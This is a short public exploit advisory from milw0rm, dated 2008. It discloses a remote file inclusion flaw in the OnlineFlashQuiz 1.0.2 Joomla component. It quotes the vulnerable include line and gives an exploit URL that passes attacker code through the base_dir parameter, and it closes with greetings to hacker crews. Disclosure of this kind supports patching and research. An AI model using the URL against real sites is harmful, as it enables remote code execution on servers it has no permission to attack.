Joomla Component OnlineFlashQuiz <= 1.0.2 RFI Vulnerability

/==============================================================================================================\ | | | [o] Online FlashQuiz 1.0.2 Remote File Inclusion Vulnerability | | | | Software : com_onlineflashquiz version 1.0.2 - paid component | | Developer : www.elearningforce.biz | | Author : NoGe | | Contact : noge[dot]code[at]gmail[dot]com | | | |==============================================================================================================| | | | [o] Vulnerable file | | | | component/com_onlineflashquiz/quiz/common/db_config.inc.php | | | | include_once($base_dir.&#34;common/classes/DBBase.class.php&#34;); | | | | | | | | [o] Exploit | | | | http://localhost/path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=[evilcode] | | | |==============================================================================================================| | | | [o] Greetz | | | | all crew #papuahacker #baliemhackerlink #nyubicrew | | skulmatic olibekas ulga Cungkee nyubi k1tk4t str0ke | | yooogy H312Y Vrs-hCk Oon_Boy Paman mousekill }^-^{ SiKodoQ | | http://kapukvalley.net member | | | \==============================================================================================================/ # milw0rm.com [2008-04-02]